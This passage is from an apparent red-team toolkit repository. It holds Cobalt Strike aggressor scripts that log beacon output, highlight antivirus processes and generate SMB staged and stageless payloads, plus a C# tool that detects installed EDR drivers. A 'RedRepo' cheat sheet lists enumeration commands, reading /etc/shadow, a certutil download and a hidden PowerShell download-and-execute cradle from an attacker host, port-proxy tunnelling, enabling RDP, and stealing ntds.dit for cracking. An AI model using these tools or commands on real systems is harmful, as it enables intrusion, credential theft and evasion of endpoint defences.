60 | on beacon_output_alt {
61 |
62 | $bd = bdata($1);
63 | local('$out');
64 |
65 | $out = openf(">>/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $bd['internal'] . "_" . $bd['computer'] . "_output.log");
66 |
67 | println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
68 | println($out, "$2" . "\n");
69 |
70 | closef($out);
71 |
72 | }
73 |
74 | on beacon_tasked {
75 |
76 | $bd = bdata($1);
77 | local('$out');
78 |
79 | $out = openf(">>/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $bd['internal'] . "_" . $bd['computer'] . "_output.log");
80 |
81 | println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
82 | println($out, "$2" . "\n");
83 |
84 | closef($out);
85 |
86 | }
87 |
88 | set BEACON_OUTPUT_PS {
89 |
90 | $bd = bdata($1);
91 | local('$out');
92 |
93 | $out = openf(">>/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $bd['internal'] . "_" . $bd['computer'] . "_output.log");
94 |
95 | println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
96 | println($out, "$2" . "\n");
97 |
98 | closef($out);
99 |
100 | $handle = openf(script_resource("av_hips_executables.txt"));
101 |
102 | while $line (readln($handle)) {
103 | push(@avlist,$line);
104 | }
105 |
106 | local('$outps $temp $name $ppid $pid $arch $user $session @ps');
107 | $outps .= "\cC[*]\o Process List with process highlighting of AV/HIPS, Browsers, Explorer/Winlogon, current processes\n";
108 | $outps .= "\cC[*]\o Current Running PID: \c8 Yellow \o \n";
109 | $outps .= "\cC[*]\o AV/HIPS: \c4 RED \o \n";
110 | $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n";
111 | $outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n\n";
112 | $outps .= " PID PPID Name Arch Session User\n";
113 | $outps .= "\cE --- ---- ---- ---- ------- -----\n";
114 |
115 | foreach $temp (split("\n", ["$2" trim])) {
116 | ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp);
117 |
118 |
119 | # highlight AV processes in RED.
120 | if(iff($name in @avlist,true,false)) {
121 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
122 |
123 | # highlight explorer , winlogon in BLUE
124 | } else if ($name eq "explorer.exe" || $name eq "winlogon.exe") {
125 | push(@ps, %(pid => $pid, entry => "\c2 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
126 |
127 | # highlight browsers processes in GREEN
128 | } else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe") {
129 | push(@ps, %(pid => $pid, entry => "\c3 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
130 |
131 | # highlight current process in YELLOW
132 | } else if ($pid eq $bd['pid']) {
133 | push(@ps, %(pid => $pid, entry => "\c8 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
134 |
135 | } else {
136 | push(@ps, %(pid => $pid, entry => " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user"));
137 |
138 | }
139 |
140 | }
141 |
142 | # sort the processes please
143 | sort({ return $1['pid'] <=> $2['pid']; }, @ps);
144 |
145 | # append to our outstring
146 | foreach $temp (@ps) {
147 |
148 | $outps .= "$temp['entry'] \n";
149 |
150 | }
151 |
152 | return $outps;
153 | }
154 |
155 | set BEACON_OUTPUT_LS {
156 |
157 | $bd = bdata($1);
158 | local('$out');
159 |
160 | $out = openf(">>/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $bd['internal'] . "_" . $bd['computer'] . "_output.log");
161 |
162 | println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
163 | println($out, $outls . "$2" . "\n");
164 |
165 | closef($out);
166 |
167 | local('$outls @results $cwd $entry $type $size $modified $name');
168 | @results = split("\n", ["$2" trim]);
169 |
170 | $cwd = left(shift(@results), -1); # first entry is the current folder
171 |
172 | # parse/process results
173 | foreach $entry (@results) {
174 | ($type, $size, $modified, $name) = split("\t", $entry);
175 | if ($type eq "F") {
176 | $entry = %(type => "fil", size => format_size($size), modified => $modified, name => $name);
177 | }
178 | else if ($type eq "D" && $name ne "." && $name ne "..") {
179 | $entry = %(type => "dir", size => "", modified => $modified, name => $name);
180 | }
181 | else {
182 | remove();
183 | }
184 | }
185 |
186 | # sort in alpha order with dir listings on top.
187 | sort({ return ($1['type'] . lc($1['name'])) cmp ($2['type'] . lc($2['name'])); }, @results);
188 |
189 | $outls .= "\cC[*]\o Listing: $cwd $+ \n\n";
190 | $outls .= " Size Type Last Modified Name\n";
191 | $outls .= "\cE ---- ---- ------------- ----\n";
192 |
193 | foreach $entry (@results) {
194 | ($type, $size, $modified, $name) = values($entry, @('type', 'size', 'modified', 'name'));
195 | $outls .= " $[8]size $[7]type $[21]modified $name $+ \n";
196 | }
197 |
198 | return $outls;
199 | }
200 |
--------------------------------------------------------------------------------
/SMBPayloadGenerator.cna:
--------------------------------------------------------------------------------
1 | #SMB Artifact Payload Generator
2 | #Author: @r3dQu1nn
3 | #Generates any type of Stageless/Staged Payload based off a SMB Listener
4 |
5 | #Custom Directory for Payloads
6 | mkdir("/opt/cobaltstrike/SMB_Staged_Payloads");
7 | mkdir("/opt/cobaltstrike/SMB_Stageless_Payloads");
8 |
9 | menubar("SMB Payload Generator", "payloadgenerator", 2);
10 | popup payloadgenerator {
11 | menu "&SMB Payload Generator" {
12 | item "&SMB Staged Payloads" {
13 | payloadgeneratestaged();
14 | }
15 | item "&SMB Stageless Payloads" {
16 | payloadgeneratestageless();
17 | }
18 | }
19 | }
20 |
21 | sub payloadgeneratestaged {
22 |
23 | $dialog = dialog("SMB Payload Generator", %(listener => "Listener: ", payload_type => "Payload Type: ", Output => "Output: "), &Staged_Output);
24 | dialog_description($dialog, "Generates a Staged or Stageless SMB Payload based on the selected SMB listener. **Payloads will be stored in /opt/cobaltstrike/SMB_Staged_Payloads**");
25 | drow_listener_smb($dialog, "listener", "Listener: ");
26 | drow_text($dialog, "Name", "Payload Name: ");
27 | drow_combobox($dialog, "payload_type", "Payload Type: ", @("Staged"));
28 | drow_combobox($dialog, "Output", "Output: ", @("dll", "dllx64", "exe", "powershell", "python", "svcexe", "vbscript"));
29 | dbutton_action($dialog, "Generate");
30 | dialog_show($dialog);
31 |
32 | }
33 |
34 | sub payloadgeneratestageless {
35 |
36 | $dialog = dialog("SMB Payload Generator", %(listener => "Listener: ", payload_type => "Payload Type: ", Output => "Output: "), &Stageless_Output);
37 | dialog_description($dialog, "Generates a Staged or Stageless SMB Payload based on the selected SMB listener. **Payloads will be stored in /opt/cobaltstrike/SMB_Stageless_Payloads**");
38 | drow_listener_smb($dialog, "listener", "Listener: ");
39 | drow_text($dialog, "Name", "Payload Name: ");
40 | drow_combobox($dialog, "payload_type", "Payload Type: ", @("Stageless"));
41 | drow_combobox($dialog, "Output", "Output: ", @("dll", "dllx64", "exe", "powershell", "svcexe", "raw"));
42 | dbutton_action($dialog, "Generate");
43 | dialog_show($dialog);
44 |
45 | }
46 |
47 | sub Staged_Output {
48 |
49 | #Error Check
50 | if ($3['Name'] ismatch "") {
51 | berror($1, 'You did not select a proper SMB Listener or Input a Payload Name!');
52 | show_message("Please select a proper SMB Listener and Input a Payload Name!");
53 | }
54 | #Staged Payloads
55 | else if ($3['Output'] eq 'dll') {
56 | $data = artifact($3['listener'], "dll");
57 | $handle = openf(">/opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".dll");
58 | writeb($handle, $data);
59 | closef($handle);
60 | show_message("Saved SMB DLL at /opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".dll");
61 | clear($3);
62 | }
63 | else if ($3['Output'] eq 'dllx64') {
64 | $data = artifact($3['listener'], "dllx64");
65 | $handle = openf(">/opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".dll");
66 | writeb($handle, $data);
67 | closef($handle);
68 | show_message("Saved 64 bit SMB DLL at /opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".dll");
69 | clear($3);
70 | }
71 | else if ($3['Output'] eq 'exe') {
72 | $data = artifact($3['listener'], "exe");
73 | $handle = openf(">/opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".exe");
74 | writeb($handle, $data);
75 | closef($handle);
76 | show_message("Saved EXE at /opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".exe");
77 | clear($3);
78 | }
79 | else if ($3['Output'] eq 'powershell') {
80 | $data = artifact($3['listener'], "powershell");
81 | $handle = openf(">/opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] ."");
82 | writeb($handle, $data);
83 | closef($handle);
84 | show_message("Saved Powershell SMB Payload at /opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] ."");
85 | clear($3);
86 | }
87 | else if ($3['payload_type'] eq 'Staged' && $3['Output'] eq 'python') {
88 | $data = artifact($3['listener'], "python");
89 | $handle = openf(">/opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".py");
90 | writeb($handle, $data);
91 | closef($handle);
92 | show_message("Saved Python SMB Payload at /opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".py");
93 | clear($3);
94 | }
95 | else if ($3['payload_type'] eq 'Staged' && $3['Output'] eq 'svcexe') {
96 | $data = artifact($3['listener'], "svcexe");
97 | $handle = openf(">/opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".exe");
98 | writeb($handle, $data);
99 | closef($handle);
100 | show_message("Saved SVCEXE at /opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".exe");
101 | clear($3);
102 | }
103 | else if ($3['payload_type'] eq 'Staged' && $3['Output'] eq 'vbscript') {
104 | $data = artifact($3['listener'], "vbscript");
105 | $handle = openf(">/opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".vbs");
106 | writeb($handle, $data);
107 | closef($handle);
108 | show_message("Saved vbscript SMB Payload at /opt/cobaltstrike/SMB_Staged_Payloads/". $3['Name'] .".vbs");
109 | clear($3);
110 | }
111 |
112 | }
113 |
114 | sub Stageless_Output {
115 |
116 | if ($3['Name'] ismatch "") {
117 | berror($1, 'You did not select a proper SMB Listener or Input a Payload Name!');
118 | show_message("Please select a proper SMB Listener and Input a Payload Name!");
119 | }
120 | #Stageless Payloads
121 | else if ($3['Output'] eq 'dll') {
122 | artifact_stageless($3['listener'], "dll", "x86", "", &dll);
123 | $Name = "".$3['Name']."";
124 | }
125 | else if ($3['Output'] eq 'dllx64') {
126 | artifact_stageless($3['listener'], "dllx64", "x86", "", &dllx64);
127 | $Name = "".$3['Name']."";
128 | }
129 | else if ($3['Output'] eq 'exe') {
130 | artifact_stageless($3['listener'], "exe", "x86", "", &exe);
131 | $Name = "".$3['Name']."";
132 | }
133 | else if ($3['Output'] eq 'powershell') {
134 | artifact_stageless($3['listener'], "powershell", "x86", "", &ps1);
135 | $Name = "".$3['Name']."";
136 | }
137 | else if ($3['Output'] eq 'raw') {
138 | artifact_stageless($3['listener'], "raw", "x86", "", &raw);
139 | $Name = "".$3['Name']."";
140 | }
141 | else if ($3['Output'] eq 'svcexe') {
142 | artifact_stageless($3['listener'], "svcexe", "x86", "", &svcexe);
143 | $Name = "".$3['Name']."";
144 | }
145 | }
146 |
147 | #Sub Functions for Stageless Artifacts
148 | sub dll {
149 |
150 | #Write and Save Payload
151 | local('$cradle');
152 | $cradle = openf(">/opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".dll");
153 | writeb($cradle, $1);
154 | closef($cradle);
155 | show_message("Saved SMB DLL at /opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".dll");
156 |
157 | }
158 |
159 | sub dllx64 {
160 |
161 | #Write and Save Payload
162 | local('$cradle1');
163 | $cradle1 = openf(">/opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".dll");
164 | writeb($cradle1, $1);
165 | closef($cradle1);
166 | show_message("Saved 64 bit SMB DLL at /opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".dll");
167 |
168 | }
169 |
170 | sub exe {
171 |
172 | #Write and Save Payload
173 | local('$cradle2');
174 | $cradle2 = openf(">/opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".exe");
175 | writeb($cradle2, $1);
176 | closef($cradle2);
177 | show_message("Saved EXE at /opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".exe");
178 |
179 | }
180 |
181 | sub ps1 {
182 |
183 | #Write and Save Payload
184 | local('$cradle3');
185 | $cradle3 = openf(">/opt/cobaltstrike/SMB_Stageless_Payloads/". $Name ."");
186 | writeb($cradle3, $1);
187 | closef($cradle3);
188 | show_message("Saved Powershell SMB Payload at /opt/cobaltstrike/SMB_Stageless_Payloads/". $Name ."");
189 |
190 | }
191 |
192 | sub raw {
193 |
194 | #Write and Save Payload
195 | local('$cradle4');
196 | $cradle4 = openf(">/opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".bin");
197 | writeb($cradle4, $1);
198 | closef($cradle4);
199 | show_message("Saved Raw SMB Payload at /opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".bin");
200 |
201 | }
202 |
203 | sub svcexe {
204 |
205 | #Write and Save Payload
206 | local('$cradle5');
207 | $cradle5 = openf(">/opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".exe");
208 | writeb($cradle5, $1);
209 | closef($cradle5);
210 | show_message("Saved EXE at /opt/cobaltstrike/SMB_Stageless_Payloads/". $Name .".exe");
211 |
212 | }
213 |
--------------------------------------------------------------------------------
/DriverSearcher/DriverSearcher/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.IO;
6 |
7 | namespace DriverSearcher
8 | {
9 | class Program
10 | {
11 | static void Main(string[] args)
12 | {
13 | string[] files = Directory.GetFiles("C:\\Windows\\System32\\drivers\\", "*.*", SearchOption.AllDirectories);
14 | System.Collections.Hashtable matches = new System.Collections.Hashtable();
15 | Console.WriteLine("[*] Twitter: @r3dQu1nn");
16 | Console.WriteLine("[*] Checking for installed EDR Products... [*]");
17 | foreach (string filepath in files)
18 | {
19 | string filename = Path.GetFileName(filepath);
20 | switch (filename.ToLower())
21 | {
22 | case "wdnisdrv.sys":
23 | matches.Add(filename, "Windows Defender Found!");
24 | break;
25 | case "fekern.sys": case "wfp_mrt.sys":
26 | matches.Add(filename, "FireEye Found!");
27 | break;
28 | case "eaw.sys":
29 | matches.Add(filename, "Raytheon Cyber Solutions Found!");
30 | break;
31 | case "rvsavd.sys":
32 | matches.Add(filename, "CJSC Returnil Software Found!");
33 | break;
34 | case "dgdmk.sys":
35 | matches.Add(filename, "Verdasys Inc. Found!");
36 | break;
37 | case "atrsdfw.sys":
38 | matches.Add(filename, "Altiris (Symantec) Found!");
39 | break;
40 | case "mbamwatchdog.sys":
41 | matches.Add(filename, "Malwarebytes Found!");
42 | break;
43 | case "edevmon.sys": case "ehdrv.sys":
44 | matches.Add(filename, "ESET Found!");
45 | break;
46 | case "sentinelmonitor.sys":
47 | matches.Add(filename, "SentinelOne Found!");
48 | break;
49 | case "edrsensor.sys": case "hbflt.sys": case "bdsvm.sys": case "gzflt.sys": case "bddevflt.sys": case "avckf.sys": case "atc.sys": case "avc3.sys": case "trufos.sys": case "bdsandbox.sys":
50 | matches.Add(filename, "BitDefender Found!");
51 | break;
52 | case "hexisfsmonitor.sys":
53 | matches.Add(filename, "Hexis Cyber Solutions Found!");
54 | break;
55 | case "cyoptics.sys": case "cyprotectdrv32.sys": case "cyprotectdrv64.sys":
56 | matches.Add(filename, "Cylance Inc. Found!");
57 | break;
58 | case "aswsp.sys":
59 | matches.Add(filename, "Avast Found!");
60 | break;
61 | case "mfeaskm.sys": case "epdrv.sys": case "mfencfilter.sys": case "mfencoas.sys": case "mfehidk.sys": case "swin.sys": case "hdlpflt.sys": case "mfprom.sys": case "mfeeeff.sys":
62 | matches.Add(filename, "McAfee Found!");
63 | break;
64 | case "groundling32.sys": case "groundling64.sys":
65 | matches.Add(filename, "Dell Secureworks Found!");
66 | break;
67 | case "avgtpx86.sys": case "avgtpx64.sys":
68 | matches.Add(filename, "AVG Technologies Found!");
69 | break;
70 | case "pgpwdefs.sys": case "geprotection.sys": case "diflt.sys": case "sysmon.sys": case "ssrfsf.sys": case "emxdrv2.sys": case "reghook.sys": case "spbbcdrv.sys": case "bhdrvx86.sys": case "bhdrvx64.sys": case "SISIPSFileFilter.sys": case "symevent.sys": case "vxfsrep.sys": case "virtfile.sys": case "symafr.sys": case "symefasi.sys": case "symefa.sys": case "symefa64.sys": case "symhsm.sys": case "evmf.sys": case "gefcmp.sys": case "vfsenc.sys": case "pgpfs.sys": case "fencry.sys": case "symrg.sys":
71 | matches.Add(filename, "Symantec Found!");
72 | break;
73 | case "safe-agent.sys":
74 | matches.Add(filename, "SAFE-Cyberdefense Found!");
75 | break;
76 | case "cybkerneltracker.sys":
77 | matches.Add(filename, "CyberArk Software Found!");
78 | break;
79 | case "klifks.sys": case "klifaa.sys": case "klifsm.sys":
80 | matches.Add(filename, "Kaspersky Found!");
81 | break;
82 | case "savonaccess.sys": case "sld.sys":
83 | matches.Add(filename, "Sophos Found!");
84 | break;
85 | case "ssfmonm.sys":
86 | matches.Add(filename, "Webroot Software, Inc. Found!");
87 | break;
88 | case "carbonblackk.sys": case "Parity.sys": case "cbk7.sys": case "cbstream.sys":
89 | matches.Add(filename, "Carbon Black Found!");
90 | break;
91 | case "crexecprev.sys":
92 | matches.Add(filename, "Cybereason Found!");
93 | break;
94 | case "im.sys": case "csagent.sys": case "CSBoot.sys": case "CSDeviceControl.sys": case "cspcm2.sys":
95 | matches.Add(filename, "CrowdStrike Found!");
96 | break;
97 | case "cfrmd.sys": case "cmdccav.sys": case "cmdguard.sys": case "cmdmnefs.sys": case "mydlpmf.sys":
98 | matches.Add(filename, "Comodo Security Solutions Found!");
99 | break;
100 | case "psinproc.sys": case "psinfile.sys": case "amfsm.sys": case "amm8660.sys": case "amm6460.sys":
101 | matches.Add(filename, "Panda Security Found!");
102 | break;
103 | case "fsgk.sys": case "fsatp.sys": case "fshs.sys":
104 | matches.Add(filename, "F-Secure Found!");
105 | break;
106 | case "esensor.sys":
107 | matches.Add(filename, "Endgame Found!");
108 | break;
109 | case "csacentr.sys": case "csaenh.sys": case "csareg.sys": case "csascr.sys": case "csaav.sys": case "csaam.sys":
110 | matches.Add(filename, "Cisco Found!");
111 | break;
112 | case "tmums.sys": case "hfileflt.sys": case "tmumh.sys": case "acdriver.sys": case "sakfile.sys": case "sakmfile.sys": case "fileflt.sys": case "tmesflt.sys": case "tmevtmgr.sys": case "tmfileencdmk.sys":
113 | matches.Add(filename, "Trend Micro Inc Found!");
114 | break;
115 | case "epregflt.sys": case "medlpflt.sys": case "dsfa.sys": case "cposfw.sys":
116 | matches.Add(filename, "Check Point Software Technologies Found!");
117 | break;
118 | case "psepfilter.sys": case "cve.sys":
119 | matches.Add(filename, "Absolute Found!");
120 | break;
121 | case "brfilter.sys": case "brcow_x_x_x_x.sys":
122 | matches.Add(filename, "Bromium Found!");
123 | break;
124 | case "lragentmf.sys":
125 | matches.Add(filename, "LogRhythm Found!");
126 | break;
127 | case "libwamf.sys":
128 | matches.Add(filename, "OPSWAT Inc Found!");
129 | break;
130 | default:
131 | break;
132 | }
133 | }
134 |
135 | if (matches.Count == 0)
136 | {
137 | Console.WriteLine();
138 | Console.WriteLine("[+] No EDR Products found. [+]");
139 | Console.WriteLine("[+] Keep in mind that Cloud-Based EDR solutions could be present. [+]");
140 | }
141 | else
142 | {
143 | Console.WriteLine();
144 | Console.WriteLine("[!] Alert!! The following EDR products were found:");
145 | Console.WriteLine("[!] Be careful what you execute!");
146 | Console.WriteLine("[!] Vendor Information:");
147 | Console.WriteLine();
148 | foreach (string key in matches.Keys)
149 | {
150 | Console.WriteLine("\t{0} - {1}", key, matches[key]);
151 | }
152 | }
153 | Console.WriteLine();
154 | Console.WriteLine("[+] Done!");
155 | Console.WriteLine("[+] Happy Hacking!");
156 | }
157 | }
158 | }
159 |
--------------------------------------------------------------------------------
/RedTeamRepo.cna:
--------------------------------------------------------------------------------
1 | #RedTeamRepo
2 | #Author: @r3dqu1nn
3 | #A Common Repository for when you forget your RTFM and no googles.
4 | #https://www.sock-raw.org/wiki/doku.php/start - @ithilgore
5 | #http://pwnwiki.io/#!index.md
6 | #https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
7 | #This script will be continuously updated. Any input or feedback is welcomed!! Enjoy and happy hacking!
8 |
9 | beacon_command_register("RedRepo", "A large repository of commands and red team tips",
10 | "\nSyntax: RedRepo [Option]\n" .
11 | "\nList Options: RedRepo [List]\n" .
12 | "\nDisplays well known commands for an OS, or diplays great tips or tricks for a Red Team Operator.\n");
13 |
14 | alias RedRepo {
15 |
16 | if ($2 ismatch 'List') {
17 | local('$out');
18 | #blog($1, "\c0\n\nRepo Options\n============");
19 | $out = "RedRepo Options\n";
20 | $out .= " \c0===============\n\n";
21 | $out .= " Option Description\n";
22 | $out .= "\c0 ------ -----------\n";
23 | blog($1, $out);
24 | blog2($1, "\cBWindows Windows Enumeration Commands");
25 | blog2($1, "\cBLinux Linux Enumeration Commands");
26 | blog2($1, "\cBTips Red Team Tips");
27 | blog2($1, "\cBList List of Options");
28 | blog2($1, "\cBSmile Happy Hacking!\n");
29 |
30 | }
31 |
32 | if ($2 ismatch 'Windows') {
33 |
34 | blog($1, "\t\c4====== Common Windows Commands ======\n");
35 |
36 | #WMIC Commands
37 | blog($1, "\t\c4====== WMIC Enumeration Commands ======\n");
38 |
39 | blog2($1, "\t\cBwmic computersystem get Name,domain,NumberofProcessors,Roles,totalphysicalmemory");
40 | blog2($1, "\t\cBwmic desktop get Name,ScreenSaverActive,Wallpaper");
41 | blog2($1, "\t\cBwmic netlogin get Caption,Privileges,UserID,UserType,NumberOfLogons,PasswordAge,LogonServer,Workstations");
42 | blog2($1, "\t\cBwmic process get CSName,Description,ExecutablePath,ProcessId");
43 | blog2($1, "\t\cBwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName");
44 | blog2($1, "\t\cBwmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace");
45 | blog2($1, "\t\cBwmic netuse list full");
46 | blog2($1, "\t\cBwmic startup get Caption,Command,Location,User");
47 | blog2($1, "\t\cBwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version");
48 | blog2($1, "\t\cBwmic qfe get HotFixID,InstalledOn");
49 | blog2($1, "\t\cBwmic ntdomain list");
50 | blog2($1, "\t\cBwmic bios [list full]\n");
51 |
52 | blog($1, "\t\c4====== Info Harvesting ======\n");
53 | #Host Enumeration
54 | blog2($1, "\t\cBsysteminfo");
55 | blog2($1, "\t\cBsysteminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"");
56 | blog2($1, "\t\cBSET");
57 | blog2($1, "\t\cBipconfig /all");
58 | blog2($1, "\t\cBroute print");
59 | blog2($1, "\t\cBarp -a");
60 | blog2($1, "\t\cBnetstat -ano | findstr /I listening");
61 | blog2($1, "\t\cBnetstat -ano | findstr /I established");
62 | blog2($1, "\t\cBnbtstat -A *target IP*");
63 | blog2($1, "\t\cBnslookup");
64 | blog2($1, "\t\cBreg query [key]");
65 | blog2($1, "\t\cBGet-ItemProperty [key] (PowerShell)");
66 | blog2($1, "\t\cBschtasks /query /fo LIST /v");
67 | blog2($1, "\t\cBsc query");
68 | blog2($1, "\t\cBsc qc [service name]");
69 | blog2($1, "\t\cBtasklist /SVC (/S Remote Computer)");
70 | blog2($1, "\t\cBDRIVERQUERY");
71 | blog2($1, "\t\cBRun C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config");
72 | blog2($1, "\t\cBgpresult /z");
73 | blog2($1, "\t\cBwhoami /all");
74 | blog2($1, "\t\cBnetsh firewall show conf");
75 | blog2($1, "\t\cBnetsh wlan show profiles");
76 | blog2($1, "\t\cBnetsh advfirewall show allprofiles\n");
77 |
78 | blog($1, "\t\c4======= Net Commands =======\n");
79 | #Old School Net Commands
80 | blog2($1, "\t\cBnet accounts [/domain]");
81 | blog2($1, "\t\cBnet group \"groupname\" [/domain]");
82 | blog2($1, "\t\cBnet localgroup \"groupname\" [/domain]");
83 | blog2($1, "\t\cBnet view [/domain]");
84 | blog2($1, "\t\cBnet session");
85 | blog2($1, "\t\cBnet share");
86 | blog2($1, "\t\cBnet user [/domain]");
87 | blog2($1, "\t\cBnet user [username] [/domain]");
88 | blog2($1, "\t\cBnet use * \\\\IP\\C$ /user:username [password]");
89 | blog2($1, "\t\cBUse the built in net commands with Beacon! [help net]\n");
90 |
91 | }
92 |
93 | if ($2 ismatch 'Linux') {
94 |
95 | blog($1, "\t\c4====== Common Linux Commands ======\n");
96 |
97 | blog($1, "\t\c4====== Info Harvesting/Host/Network Enumeration ======\n")
98 |
99 | blog2($1, "\t\cBcat /etc/issue");
100 | blog2($1, "\t\cBcat /etc/*-release");
101 | blog2($1, "\t\cBcat /etc/*-release | grep -E '\"NAME=\"|ID|VERSION|ID_LIKE'");
102 | blog2($1, "\t\cBcat /proc/version");
103 | blog2($1, "\t\cBrpm -q kernel");
104 | blog2($1, "\t\cBdmesg | grep Linux");
105 | blog2($1, "\t\cBls /boot | grep vmlinuz-");
106 | blog2($1, "\t\cBlsb_release -a");
107 | blog2($1, "\t\cBlast -a");
108 | blog2($1, "\t\cBuname -a");
109 | blog2($1, "\t\cBuname -mrs");
110 | blog2($1, "\t\cBid");
111 | blog2($1, "\t\cBhistory");
112 | blog2($1, "\t\cBarp -a");
113 | blog2($1, "\t\cBnetstat -anot");
114 | blog2($1, "\t\cBps -elf");
115 | blog2($1, "\t\cBps -elf | grep root");
116 | blog2($1, "\t\cBls -la /var/www/html/");
117 | blog2($1, "\t\cBservice apache2 status");
118 | blog2($1, "\t\cBcat /etc/resolv.conf");
119 | blog2($1, "\t\cBcat /etc/networks");
120 | blog2($1, "\t\cBiptables -L");
121 | blog2($1, "\t\cBiptables -L -t nat");
122 | blog2($1, "\t\cBlsof -i");
123 | blog2($1, "\t\cBcat /etc/services");
124 | blog2($1, "\t\cBgrep 80 /etc/services");
125 | blog2($1, "\t\cBw");
126 | blog2($1, "\t\cBroute -n");
127 | blog2($1, "\t\cBcat /etc/passwd");
128 | blog2($1, "\t\cBcat /etc/passwd | awk -F : '{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}'");
129 | blog2($1, "\t\cBcat /etc/motd");
130 | blog2($1, "\t\cBcat /etc/group");
131 | blog2($1, "\t\cBcat /etc/shadow\n");
132 |
133 |
134 | }
135 |
136 | if ($2 ismatch 'Tips') {
137 |
138 | blog($1, "\t\c4====== Red Team Tips ======\n");
139 | #Red Tips
140 | blog2($1, "\t\cBhttps://github.com/vysec/RedTips (If you have InterWebs)");
141 | blog2($1, "\t\cBhttps://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt (InterWebs Required)");
142 | blog2($1, "\t\cBNeed a map of the network? Run Bloodhound!! https://github.com/BloodHoundAD/BloodHound");
143 | blog2($1, "\t\cBAlways check sysvols!! Domain Controllers will have them, you'll be surprised how some are still viewable by normal users.");
144 | blog2($1, "\t\cBnet user a specific user and see if they are executing any logon scripts, those might contain juicy information.");
145 | blog2($1, "\t\cBAlways check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.");
146 | blog2($1, "\t\cBFind those Fileservers! Sysadmins leave behind all kinds of goodies there.");
147 | blog2($1, "\t\cBUse a Windows 7 workstation to tunnel your traffic natively. netsh int portproxy v4tov4 listenport=[port] connecthost=[AttackerIP] connectport=[port]");
148 | blog2($1, "\t\cBUse certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.");
149 | blog2($1, "\t\cBThe all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))\"");
150 | blog2($1, "\t\cBUse tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.");
151 | blog2($1, "\t\cBEnable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f");
152 | blog2($1, "\t\cBPlease wrap/encode/pack your payloads if you have to drop to disk!");
153 | blog2($1, "\t\cBTry to stay in memory and avoid putting files on disk.");
154 | blog2($1, "\t\cBLive off the land!! Use what is on the target, native windows binaries are very powerful!");
155 | blog2($1, "\t\cBUse AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.");
156 | blog2($1, "\t\cBEnterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!");
157 | blog2($1, "\t\cBInvoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.");
158 | blog2($1, "\t\cBHave multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.");
